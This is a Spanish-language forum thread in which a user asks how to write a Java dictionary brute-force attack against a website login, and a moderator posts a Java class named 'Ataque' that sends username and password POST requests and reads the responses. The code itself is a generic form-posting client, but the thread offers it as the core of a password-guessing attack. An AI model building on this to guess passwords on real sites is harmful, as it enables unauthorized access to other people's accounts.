Autor Tema: force brute(diccionario)  (Leído 4070 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado lol

  • Usuario regular
  • **
  • Mensajes: 53
  • Karma: +8/-0
  • lol
    • Ver Perfil
force brute(diccionario)
« : febrero 16, 2010, 07:42:49 pm »
Primero decir que no es java orientado a WEB pero trata esta misma, ya que es un ataque para webs .

Estoy intentando-lo hacer ...
Primero he creado la URL es decir :
Código: java [Seleccionar]
URL url = new URL("http://www.tuweb.com");


y luego he leído el source de dicha web :

Código: java [Seleccionar]
    try {
            URL url = new URL("http://www.tuweb.com");
       BufferedReader in = new BufferedReader(newInputStreamReader(url.openStream()));
            String source;        
            while ((entrada = in.readLine()) != null) {

              
                System.out.println(entrada); //para ver si es correcto.
              
            }
            in.close();

        } catch (IOException ex) {
            Logger.getLogger(NewJFrame.class.getName()).log(Level.SEVERE, null, ex);
        }


ahora lo que quiero hacer es entrar a la web conectándome por medio de POST es decir registrándome logeandome, teniendo una variable String "usuario" , y luego muchas en un documento de texto hasta aquí bien .

es decir y luego volver a leer el source1 es decir si con un "if" y una negación "!" source = source1 , entonces la contraseña va si "else" no encontrada.

Mis dudas las tengo en conectarme en la web por medio de POST .

Por ahora creo que en esta web lo explica bien ... http://www.exampledepot.com/egs/java.net/Post.html

Salu2

Estoy teniendo algunos problemas por que puedes leer una linea de alguna "texto"(lol.txt), es decir readline();
Pero claro como hacer cada palabra una variable???
« Última Modificación: febrero 17, 2010, 07:59:06 pm por lol »
Si has encontrado útil este articulo recuerda que puedes ayudarnos con tu donación voluntaria la cual ayudará al staff y a la mantención del foro.

Desconectado DonVidela

  • Moderador
  • Recién llegado
  • *****
  • Mensajes: 6
  • Karma: +0/-0
    • Ver Perfil
    • Email
Re:force brute(diccionario)
« Respuesta #1 : diciembre 01, 2012, 12:17:42 pm »
Esto solo requiere un poco de busqueda en google, lo que tu haces es solo leer la pagina.

Para lo que quieres encontre material interesante, así que lo dejo para que tu lo adaptes a tus necesidades, la clase HttpURLConnection es la clave, deberías leer la api para aprendertela bien.


Código: java [Seleccionar]

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.HttpURLConnection;
import java.net.URL;


/**
 *
 * @author Administrador
 */
public class Ataque {
    private int maxContenido;
    private String SESION;
    private String URL;
    private String RUT;
    private String NombrePWD;
    private String NombreUSR;
    private String VARS;
    private String CLAVE;
    private String resultado;
    private String strParametros;
    HttpURLConnection con;

    public int getMaxContenido() {
        return maxContenido;
    }

    public void setMaxContenido(int maxContenido) {
        this.maxContenido = maxContenido;
    }

    public String getNombrePWD() {
        return NombrePWD;
    }

    public void setNombrePWD(String NombrePWD) {
        this.NombrePWD = NombrePWD;
    }

    public String getNombreUSR() {
        return NombreUSR;
    }

    public void setNombreUSR(String NombreUSR) {
        this.NombreUSR = NombreUSR;
    }

    public String getVARS() {
        return VARS;
    }

    public void setVARS(String VARS) {
        this.VARS = VARS;
    }

    public String getSESION() {
        return SESION;
    }

    public void setSESION(String SESION) {
        this.SESION = SESION;
    }

     
    public String getCLAVE() {
        return CLAVE;
    }

    public void setCLAVE(String CLAVE) {
        this.CLAVE = CLAVE;
    }

    public String getRUT() {
        return RUT;
    }

    public void setRUT(String RUT) {
        this.RUT = RUT;
    }

    public Ataque() {
         
    }

    public String getStrParametros() {
        return strParametros;
    }

    public void setStrParametros(String strParametros) {
        this.strParametros = strParametros;
    }


    public String getURL() {
        return URL;
    }

    public void setURL(String URL) {
        this.URL = URL;
    }

     

    public String getResultado() {
        return resultado;
    }

    public void setResultado(String resultado) {
        this.resultado = resultado;
    }

     
    public void enviarConsulta(){
        try{
            setResultado("");
            URL postURL = new URL( getURL() );
            //generarParametros();
            setStrParametros( getNombreUSR() + "=" + getRUT()  + "&" + getNombrePWD() + "=" + getCLAVE() + getVARS());
             
            System.out.println("URL: " + getURL() + getStrParametros());
            con = (HttpURLConnection) postURL.openConnection();
            con.setUseCaches(false);
            con.setDoOutput(true);
            con.setDoInput(true);
            con.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            con.setRequestMethod("POST");


            PrintWriter out = new PrintWriter(con.getOutputStream());

//            System.out.println(">>> POSTING: "+getStrParametros());

            out.println(getStrParametros());
            out.close();

            String inputLine="";   //Stores the line of text returned by the server
            System.out.println("ESPERANDO RESPUESTA...\n\n");

            BufferedReader in = new BufferedReader(new InputStreamReader(con.getInputStream()));

//            while ((inputLine = in.readLine()) != null)
            while((inputLine = in.readLine()) != null && getResultado().length()<getMaxContenido())
                setResultado(getResultado() + inputLine + "\n");

            in.close();
            con.disconnect();
            //System.out.println(getResultado());

        }catch(Exception ex){
            System.out.println(ex);
        }
    }
}


La fuente de esta información es

http://www.chw.net/foro/lenguajes-de-programacion-f22/890743-fuerza-bruta-java-con-hilos.html

Buscar antes de postear.

Desconectado lol

  • Usuario regular
  • **
  • Mensajes: 53
  • Karma: +8/-0
  • lol
    • Ver Perfil
Re:force brute(diccionario)
« Respuesta #2 : diciembre 01, 2012, 02:06:59 pm »
No subas posts tan antiguos casi 3 años...

Desconectado DonVidela

  • Moderador
  • Recién llegado
  • *****
  • Mensajes: 6
  • Karma: +0/-0
    • Ver Perfil
    • Email
Re:force brute(diccionario)
« Respuesta #3 : diciembre 01, 2012, 05:19:20 pm »
Yo pense que era problema de la configuración del foro... xD como pensé que era nuevo. Pero tranquilo, a alguien más le servirá la respuesta.


. . . . . . . .